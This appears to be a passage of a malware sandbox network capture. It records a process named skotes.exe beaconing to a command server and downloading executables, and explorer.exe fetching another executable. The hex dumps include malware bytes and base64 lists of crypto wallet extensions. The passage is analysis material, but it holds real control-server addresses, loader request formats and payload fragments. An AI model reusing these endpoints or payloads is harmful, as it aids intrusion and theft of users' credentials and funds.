                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.441193104 CET1236INData Raw: 20 00 00 41 5e 5f 5e c3 48 8d 15 37 81 02 00 48 8d 4f 10 e8 2a 08 00 00 48 8b d8 48 85 c0 74 37 48 8b 0d 03 9c 02 00 48 8d 54 24 50 48 89 4c 24 50 41 b8 08 00 00 00 48 c1 e9 18 80 c1 0d 88 4c 24 53 48 8b c8 e8 28 3f 00 00 48 85 c0 75 22 48 8b cb
                                                                                                                                                                                                                                                                                        Data Ascii: A^_^H7HO*HHt7HHT$PHL$PAHL$SH(?Hu"HH_HHXsHHLOLs2H|H@uH8pkgH HHHHOxKH80HuH


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        15192.168.2.1049951185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.432971954 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 31 34 34 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: d1=1014440001&unit=246122658369
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.289215088 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:44 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        16192.168.2.1049957185.215.113.16807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:44.419589996 CET55OUTGET /well/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752664089 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:45 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 970752
                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 15:22:54 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "675affce-ed000"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 ff 5a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 20 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELZg" w@08@@@d|@(eu4@.text `.rdata@@.datalpH@.rsrc(e@f@@.relocuvZ@B
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752760887 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00
                                                                                                                                                                                                                                                                                        Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DY
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752772093 CET1236INData Raw: e8 50 c1 01 00 68 30 24 44 00 e8 eb ef 01 00 59 c3 b9 04 25 4d 00 e8 9d 98 00 00 68 3f 24 44 00 e8 d5 ef 01 00 59 c3 56 8b f1 8d 4e 18 e8 b4 87 00 00 8d 4e 08 e8 ac 87 00 00 6a 28 56 e8 e2 ec 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 83 ec 38 c7 05
                                                                                                                                                                                                                                                                                        Data Ascii: Ph0$DY%Mh?$DYVNNj(VYY^U80MtI3M0IMMVQfMo0M@0M\I0MH,M3MMMMYMMM3MTMXM\
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752779007 CET1236INData Raw: 8b ce c7 06 44 c9 49 00 e8 74 02 00 00 ff 76 04 e8 82 e8 01 00 8b f3 c7 87 4c fd ff ff 40 c9 49 00 59 39 9f 54 fd ff ff 0f 87 f2 0f 04 00 ff b7 50 fd ff ff 89 9f 54 fd ff ff e8 58 e8 01 00 8b f3 c7 87 3c fd ff ff 40 c9 49 00 59 39 9f 44 fd ff ff
                                                                                                                                                                                                                                                                                        Data Ascii: DItvL@IY9TPTX<@IY9D@D.,@IY9404Y$<IvY-
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752806902 CET1236INData Raw: 64 00 00 00 33 c9 66 a3 32 15 4d 00 41 a2 34 15 4d 00 6a 0a 89 0d 38 15 4d 00 89 0d 3c 15 4d 00 89 0d 40 15 4d 00 a2 50 15 4d 00 66 a3 fc 16 4d 00 89 0d f4 16 4d 00 89 0d f8 16 4d 00 b9 fa 00 00 00 58 89 0d 14 17 4d 00 a3 44 15 4d 00 a3 48 15 4d
                                                                                                                                                                                                                                                                                        Data Ascii: d3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]UVuWVgFO GFGFGF aPF0G0_^]33@AQQQQA,Q
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752891064 CET1236INData Raw: 8b 4f 04 8b 45 f8 8b 04 81 66 83 78 08 7f 0f 85 33 08 04 00 80 7d ff 00 8d 8e 64 01 00 00 75 1e 80 be 6d 01 00 00 00 8b 8e 68 01 00 00 75 16 8b 49 04 8b 45 0c 41 89 08 5f 5e c9 c2 08 00 e8 de 08 00 00 eb f3 8b 49 30 eb e5 55 8b ec 83 ec 18 83 65
                                                                                                                                                                                                                                                                                        Data Ascii: OEfx3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)ttH9AxUSVu3WyQ>t
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752901077 CET1236INData Raw: 04 04 00 8b 55 f8 8b 5d fc 83 e8 01 0f 85 ba fe ff ff e9 1e 04 04 00 8b 5d fc 8d 45 ec 43 89 7d ec 50 8d 8d 6c ff ff ff 89 5d fc 47 e8 ed 03 00 00 8b 85 70 ff ff ff 89 45 c0 8b 55 f8 e9 8a fe ff ff 8b 41 04 6a 7f 59 66 39 48 08 0f 85 bc 05 04 00
                                                                                                                                                                                                                                                                                        Data Ascii: U]]EC}Pl]GpEUAjYf9HEHOlEuE{lepEE;&r8EE}TPGZEHXE!#AjYf9Hm
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752913952 CET1236INData Raw: c2 04 00 55 8b ec 56 8b 75 08 57 8b f9 8b 06 89 07 8d 4f 10 8b 46 04 89 47 04 8b 46 08 89 47 08 8b 46 0c 89 47 0c 8d 46 10 83 61 08 00 50 e8 e0 d7 00 00 8d 46 20 8d 4f 20 83 61 08 00 50 e8 d0 d7 00 00 8b c7 5f 5e 5d c2 04 00 33 d2 33 c0 40 89 51
                                                                                                                                                                                                                                                                                        Data Ascii: UVuWOFGFGFGFaPF O aP_^]33@QAQA,Q Q(UE}}u4}}}} u}$~3] jjwsjjsjUVF}^W3jZQL
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752924919 CET1236INData Raw: c9 c2 0c 00 55 8b ec b8 00 00 01 00 e8 9e f1 03 00 56 57 68 ff 7f 00 00 8d 85 00 00 ff ff 8b fa 50 ff 31 ff 15 0c c2 49 00 8b f0 8b cf 8d 85 00 00 ff ff 50 e8 7d 3d 00 00 85 f6 5f 0f 95 c0 5e c9 c3 55 8b ec b8 58 00 01 00 e8 60 f1 03 00 a0 64 13
                                                                                                                                                                                                                                                                                        Data Ascii: UVWhP1IP}=_^UX`dMVuWG~"uQVqYPVw_^UtSV3MW]{uME4I]]]]xMMEhIM'nj5M
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.752934933 CET1236INData Raw: 53 56 57 6a 2c 8d 45 c8 c7 45 c4 30 00 00 00 6a 00 50 8b f9 e8 b2 f0 01 00 8b 45 14 83 c4 0c 8b 8f d0 09 00 00 33 f6 89 4d fc 6a 08 5b 6a 01 5a 2d 00 02 00 00 0f 85 eb fb 03 00 6a 40 5e 6a f5 8b cf e8 10 00 00 00 85 77 0c 0f 85 9f fc 03 00 5f 5e
                                                                                                                                                                                                                                                                                        Data Ascii: SVWj,EE0jPE3Mj[jZ-j@^jw_^[UQSVWjYwxvU};tPuEEP_^[UVjUYa~uNN^]FHUVE
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.872534990 CET1236INData Raw: 00 8b ce e8 10 72 00 00 83 c6 10 83 ef 01 75 f1 83 0d 64 23 4d 00 ff b8 90 19 4d 00 5f 5e 66 89 1d 24 1b 4d 00 89 1d 28 1b 4d 00 89 1d 2c 1b 4d 00 88 1d 30 1b 4d 00 89 1d 34 1b 4d 00 89 1d 38 1b 4d 00 88 1d 3c 1b 4d 00 89 1d 40 1b 4d 00 89 1d 60
                                                                                                                                                                                                                                                                                        Data Ascii: rud#MM_^f$M(M,M0M4M8M<M@M`#M[UVujP@#P[^]USVW3Ex}WtKEE33ft0E}PEEf9Et#C_fu}!_^[AU


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        17192.168.2.1049970185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.070673943 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 31 34 34 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: d1=1014441001&unit=246122658369
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.420921087 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:51 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        18192.168.2.1049975185.215.113.16807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.876072884 CET56OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217140913 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:52 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 1807360
                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 15:24:14 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "675b001e-1b9400"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 60 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 69 00 00 04 00 00 79 8d 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds|Fir^m[gmKbgdwwEeRichdPELdTg(`i@iy@M$a$$ $h@.rsrc$x@.idata $z@ *$|@tdoajogz`O~@xfulpslqPin@.taggant0`i"r@
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217171907 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217185020 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217304945 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217318058 CET1236INData Raw: f7 4f 07 5f 39 07 22 fc f9 14 63 73 07 cc c5 1c b5 e8 89 12 39 c4 d0 e2 e0 cc 01 42 d5 48 fa 0d c9 86 f2 f4 b8 7e ea 1c 14 22 dd a0 1a ae c8 ee 30 ac da f2 2c 3c ca 2e 05 cc bd cb 9f dd b1 bb f5 d0 a5 ca ed 4a fa f2 f7 f4 cd 4a dd ec 89 f3 ba ad
                                                                                                                                                                                                                                                                                        Data Ascii: O_9"cs9BH~"0,<.JJ%wj!D-3){]A-NWHch+9a?:8`>]Qu4w8-G!<M;5VNCFo5]":"OSJi
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217336893 CET1236INData Raw: cb a4 c8 b6 d6 bc fe fb f5 cd 0c 50 61 01 5f 64 2a e4 45 ac c7 ac 95 e3 7f ab a5 86 c6 dc 38 c4 6c 26 8b b1 bd 2b 69 23 1c 1f a2 74 91 23 8a 1e e4 5f 8b 8d 9e 03 25 23 c0 67 90 dc 27 ce d7 65 7d 15 c7 92 3d 3b 8b 41 25 3d c8 6d 05 2c 8a 5f 46 cb
                                                                                                                                                                                                                                                                                        Data Ascii: Pa_d*E8l&+i#t#_%#g'e}=;A%=m,_Fo&`AXA&&t,xh$TlON_:'i8G2,%Vuf'I_]\b#Ny"Qz".+Lf9p#bhv0UZpZ
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217350006 CET1236INData Raw: f6 17 f2 5e cb 44 a3 8a 3d d6 8f eb c5 e5 42 dd ca 68 93 72 f6 35 7a f8 06 06 3a ec 78 cc a5 7a 0d a6 9f 80 7e 14 52 f1 90 48 a4 f2 40 09 4e 34 c3 b2 10 f4 bc e4 15 0f 26 d8 34 f8 96 88 9a fa fe ec 97 ee 70 35 aa 77 cb 8e da 12 cb d4 d1 5e e1 4d
                                                                                                                                                                                                                                                                                        Data Ascii: ^D=Bhr5z:xz~RH@N4&4p5w^Ma<+e5^6X*BM"_pV:N<!1,^or~&9el`PKUHM#N4o&M\TVKl=|v9RQ
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217477083 CET1000INData Raw: bc ff 97 17 57 f0 69 67 3e 6b 8a f6 57 4b 6e 25 05 da 91 3e 3d 55 cd df bd 34 8a f0 34 09 e2 e2 22 3f 23 62 c5 d5 c1 f3 58 48 c4 ee dd 26 f3 ee 6c da a2 a6 bd dc 0c 6b 01 58 eb 02 95 da c3 d6 c6 74 0f 04 eb 1f 8a f2 e1 61 aa 3c 05 18 f3 fa 58 06
                                                                                                                                                                                                                                                                                        Data Ascii: Wig>kWKn%>=U44"?#bXH&lkXta<X+^vgKb].ffd#h]?s|f>]""\I= :9b5d}TPN5b]:tM}H
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217489958 CET1236INData Raw: cd d1 38 b6 dd 44 9b 1c 41 d5 a1 65 25 4e cb c2 4d 06 98 82 c5 00 10 63 9f d0 07 1d 6d e5 49 e3 64 4d 13 af 2f 2d e6 47 5a c7 59 e3 cf b0 07 c3 73 d0 0e ef 75 fd 94 ee 60 0e 52 4c be 6c 8e f3 8b ec c3 f0 e4 d5 4d e3 46 4e 93 61 02 08 5f e3 cd 4c
                                                                                                                                                                                                                                                                                        Data Ascii: 8DAe%NMcmIdM/-GZYsu`RLlMFNa_LB -[cA.2M,L'T\?M*|V52~#){(Kn*]B]+H3_^CO(Z\tHn!<A*#Bi
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.217500925 CET1236INData Raw: 91 00 c4 4e f9 0d f2 1e 40 8b 06 3f 0d 74 cb fc fe f2 95 06 d6 75 a2 77 d7 28 cc 2a 25 da f5 7a 23 5f 85 6b c3 09 fe e2 cd 4c c7 a2 bf 09 04 0a f9 58 a4 7a c5 54 0b 64 21 0c 98 86 39 06 3a fc c4 d4 d7 65 ca cc a6 f0 c4 a0 0a 93 f9 04 a6 9c 50 b8
                                                                                                                                                                                                                                                                                        Data Ascii: N@?tuw(*%z#_kLXzTd!9:eP-VLWH"LB6kNVmYod"}#BZHx#)r9&c1W:?(W)^9
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.337193966 CET1236INData Raw: b5 b2 45 73 c5 0c 5a e4 59 6f b4 49 75 b9 20 71 45 57 37 a0 ba 7f c5 10 bc b7 ef 06 c5 9c e9 34 73 ca 07 cb 36 65 61 1c bc 51 ee 4c 4c d8 16 3f bb da c6 82 e7 46 85 5d bb 15 d4 02 16 b4 d8 c5 f8 b8 32 27 37 25 92 42 b8 29 c8 a6 36 5b 36 65 c5 19
                                                                                                                                                                                                                                                                                        Data Ascii: EsZYoIu qEW74s6eaQLL?F]2'7%B)6[6e>%4i*VWnj+NFg77S].ZO\guM@/Hlf#O|/Qi+8P4(sAN a3 s7R|Z9L<


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        19192.168.2.1049976185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:51.982600927 CET234OUTGET /fcxcx.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308237076 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:48:52 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 22:39:28 GMT
                                                                                                                                                                                                                                                                                        ETag: "4b200-628f2276e1a78"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 307712
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 02 03 00 4b 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH(0 @ @@K H.text `.rsrc @@.reloc@BpH (wautofill5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308260918 CET1236INData Raw: 39 00 6c 00 61 00 47 00 78 00 6c 00 5a 00 6d 00 35 00 72 00 62 00 32 00 52 00 69 00 5a 00 57 00 5a 00 6e 00 63 00 47 00 64 00 72 00 62 00 6d 00 35 00 38 00 54 00 57 00 56 00 30 00 59 00 57 00 31 00 68 00 63 00 32 00 73 00 4b 00 59 00 57 00 5a 00
                                                                                                                                                                                                                                                                                        Data Ascii: 9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Np
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308273077 CET1236INData Raw: 62 00 32 00 31 00 69 00 59 00 58 00 51 00 4b 00 5a 00 6d 00 68 00 70 00 62 00 47 00 46 00 6f 00 5a 00 57 00 6c 00 74 00 5a 00 32 00 78 00 70 00 5a 00 32 00 35 00 6b 00 5a 00 47 00 74 00 71 00 5a 00 32 00 39 00 6d 00 61 00 32 00 4e 00 69 00 5a 00
                                                                                                                                                                                                                                                                                        Data Ascii: b21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308408022 CET1236INData Raw: 31 00 6c 00 61 00 57 00 31 00 6f 00 62 00 48 00 42 00 74 00 5a 00 32 00 70 00 75 00 61 00 6d 00 39 00 77 00 61 00 47 00 68 00 77 00 61 00 32 00 74 00 76 00 62 00 47 00 70 00 77 00 59 00 58 00 78 00 51 00 61 00 47 00 46 00 75 00 64 00 47 00 39 00
                                                                                                                                                                                                                                                                                        Data Ascii: 1laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhProfilesSOFTWASkyBoxRE\MicrSkyBoxosoft\WinSkyBoxdows NT\CurrentVersSky
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308419943 CET1236INData Raw: e2 25 0c bc 3c 49 8b 28 0d 95 41 ff a8 01 71 39 0c b3 de 08 b4 e4 9c d8 56 c1 90 64 cb 84 61 7b 32 b6 70 d5 6c 5c 74 48 b8 57 42 d0 54 00 6f 00 74 00 61 00 6c 00 20 00 6f 00 66 00 20 00 52 00 41 00 4d 00 45 00 78 00 65 00 63 00 75 00 74 00 61 00
                                                                                                                                                                                                                                                                                        Data Ascii: %<I(Aq9Vda{2pl\tHWBTotal of RAMExecutablePathRj068@|9/4CDT{2#=LBN.f($v[Im%rdh\]elpHP^FWXE,?k:AOg
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:53.308432102 CET1236INData Raw: 37 d3 e4 e4 8b f2 79 79 32 d5 e7 e7 43 8b c8 c8 59 6e 37 37 b7 da 6d 6d 8c 01 8d 8d 64 b1 d5 d5 d2 9c 4e 4e e0 49 a9 a9 b4 d8 6c 6c fa ac 56 56 07 f3 f4 f4 25 cf ea ea af ca 65 65 8e f4 7a 7a e9 47 ae ae 18 10 08 08 d5 6f ba ba 88 f0 78 78 6f 4a
                                                                                                                                                                                                                                                                                        Data Ascii: 7yy2CYn77mmdNNIllVV%eezzGoxxoJ%%r\..$8WsQ#|tt!>KKappB|>>qffHHaa_j55WWiX':'8+3"iip3-"<
